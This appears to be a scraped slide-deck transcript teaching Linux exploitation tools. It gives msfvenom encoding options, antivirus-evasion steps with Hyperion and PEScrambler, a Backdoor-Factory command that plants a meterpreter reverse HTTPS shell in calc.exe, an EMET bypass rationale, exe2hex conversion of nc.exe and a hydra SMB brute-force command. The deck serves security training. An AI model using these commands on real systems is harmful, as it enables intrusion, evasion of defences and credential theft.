Presentation is loading. Please wait.

Presentation is loading. Please wait.

Linux Exploitation Tools

Published byHelga Hofer Modified over 6 years ago

Similar presentations

Presentation on theme: "Linux Exploitation Tools"— Presentation transcript:

1 Linux Exploitation Tools
1LT George Raileanu

2 Linux Exploitation Tools
Shellcode – Piece of code used as the payload in the exploitation of a software vulnerability. What is a payload? What is an exploit? What is a vulnerability? Reference: Linux Exploitation Tools

3 Local Remote Staged Types of Shellcode

4 Kali Linux What is Kali Linux? Over 300 Programs
Nmap Aircrck-ng Kismet Wireshark Metasploit Burp John the Ripper Maltego Armitage OWASP ZAP Reference: Kali Linux

5 Reference: http://www. quickmeme
Metasploit

6 https://memegenerator.net/instance/50927099

7 using msfvenom to generate our shellcode:
-f c (format C / Windows) -a x86 (32 bit OS) -a x86_64 (64 bit OS) -b "\x00\x0a\x0d\x20" (exclude badchars) -e x86/shikata_ga_nai (encode the payload) BAD Characters: 0x00 == NULL Byte: NULL Bytes cause a STRCPY oper to terminate, which can truncate our buffer and ignore our shellcode. 0x0D == Carriage Return: would signify end of PASSWORD field, and terminate the buffer at that point. 0x0A == Line Feed: same reason as the carriage return. 0x20 == Spaces

8 using EXITFUNC=thread
we keep the system or service we exploited from crashing upon EXIT from our shell.

9 Exploit Obfuscation SAFE
Veil Evasion Framework: ../veil-evasion/hyperion# wine hyperion.exe filein.exe fileout.exe ../veil-evasion/hyperion# mv fileout.exe ../pescrambler/ && cd ../pescrambler/ ../veil-evasion/pescrambler# wine PEScrambler.exe -i fileout.exe -o final.exe BackDoor-Factory: ../backdoor-factory/# ./backdoor.py -f calc.exe -s \ meterpreter_reverse_https_threaded -H <LHOST> -P <LPORT> # if encountered, never use a cave section named 'None'; if no caves are adequate use 'a' to append the backdoor to the binary. but with all the mitigations and prevention mechanisms installed on Win* OSs why would this work? EMET is largely effective at complicating a variety of exploitation techniques in true 32- and 64-bit applications, often requiring attackers to find a solution to each mitigation on a caseby-case basis. Most off-the-shelf exploits will fail in the face of EMET mitigations, however, while EMET provides support for both 32 and 64-bit processes, as a limitation of its design, it does not explicitly handle the special case of WoW64 processes. This makes using a 64-bit ROP chain and secondary stage a relatively straightforward method for bypassing a significant number of EMET’s mitigations. Furthermore, 64-bit editions of EMET do not support any of the ROP-related mitigations.

10 EXE2HEX: ../exe2hex/# python3 exe2hex.py -x /tmp/safe.exe ../exe2hex/# ./exe2hex.py -x /tmp/nc.exe -b /tmp/safe.txt ../exe2hex/# cat /tmp/calc.exe | python3 exe2hex.py -s -b safe.bat -p safe.cmd Methods/OS Support • DEBUG.exe (BATch mode -b ) ◦Every version of Windows x86 (No x64 support). ◦Useful for legacy ver of Windows (e.g. XP/2000). ◦limitation of 64k file size for binary files. • PowerShell (PoSh mode -p ) ◦Supports both Windows x86 & x64. ◦Aimed at more "recent" versions of Windows. ◦Powershell was first integrated into core OS with Windows 7/Windows Server 2008 R2. ◦Windows XP SP2, Windows Server 2003 & Windows Vista requires PowerShell to be pre-installed. ◦This is not a .ps1 file (pure powershell). It only calls powershell at the end to convert.

11 Password Cracking: Password Guessing: Rainbow Tables:
Obtain encrypted/hashed passwords, and guess, decrypt, or compare on offline system. Usually much faster than password guessing. Password Guessing: Attempts to actually login to target system . . Likely generates alot of traffic and logs, and likely to lockout attempted user account(s). Much slower than pass cracking. Rainbow Tables: Reference:

12 SALT SALT Edit the password algorithm used in Linux:
$ nano /etc/pam.d/common-pasword we can change it to sha256, sha512, etc. $ openssl passwd -1 salt ABCD1234 password SALT SALT

13 hydra -L users.txt -P passwords.txt -v -o out 192.168.217.192 smb

Download ppt "Linux Exploitation Tools"

Similar presentations

Authenticating Users. Objectives Explain why authentication is a critical aspect of network security Explain why firewalls authenticate and how they identify.

Authenticating Users. Objectives Explain why authentication is a critical aspect of network security Explain why firewalls authenticate and how they identify.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
Password Cracking Lesson 10. Why crack passwords?

Password Cracking Lesson 10. Why crack passwords?
1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH.

1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH.
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.
CSCI 530 Lab Authentication. Authentication is verifying the identity of a particular person Example: Logging into a system Example: PGP – Digital Signature.

CSCI 530 Lab Authentication. Authentication is verifying the identity of a particular person Example: Logging into a system Example: PGP – Digital Signature.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.

W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.
Defeating public exploit protections (EMET v5.2 and more)

Defeating public exploit protections (EMET v5.2 and more)
VPN AND SECURITY FLAWS Rajesh Perumal Clemson University.

VPN AND SECURITY FLAWS Rajesh Perumal Clemson University.
MIS 5212.001 Week 2 Site:

MIS Week 2 Site:
CIS 450 – Network Security Chapter 8 – Password Security.

CIS 450 – Network Security Chapter 8 – Password Security.
Mark Shtern. Passwords are the most common authentication method They are inherently insecure.

Mark Shtern. Passwords are the most common authentication method They are inherently insecure.
How Safe are They?. Overview Passwords Cracking Attack Avenues On-line Off-line Counter Measures.

How Safe are They?. Overview Passwords Cracking Attack Avenues On-line Off-line Counter Measures.
Penetration Testing 101 (Boot-camp)

Penetration Testing 101 (Boot-camp)
FTP Short for File Transfer Protocol, the protocol for exchanging files over the Internet.protocolfilesInternet works in the same way as HTTP for transferring.

FTP Short for File Transfer Protocol, the protocol for exchanging files over the Internet.protocolfilesInternet works in the same way as HTTP for transferring.
CNIT 124: Advanced Ethical Hacking Ch 9: Password Attacks.

CNIT 124: Advanced Ethical Hacking Ch 9: Password Attacks.
Thwarting Remote OS Fingerprinting Eric Kluthe. What is OS fingerprinting? Sending packets, usually ICMP and TCP, and recording the responses that come.

Thwarting Remote OS Fingerprinting Eric Kluthe. What is OS fingerprinting? Sending packets, usually ICMP and TCP, and recording the responses that come.
CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.

CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.
PZAPR Parallel Zip Archive Password Recovery CSCI5576 - High Perf Sci Computing Univ. of Colorado Spring 2011 Neelam Agrawal Rodney Beede Yogesh Virkar.

PZAPR Parallel Zip Archive Password Recovery CSCI High Perf Sci Computing Univ. of Colorado Spring 2011 Neelam Agrawal Rodney Beede Yogesh Virkar.

Similar presentations

Ads by Google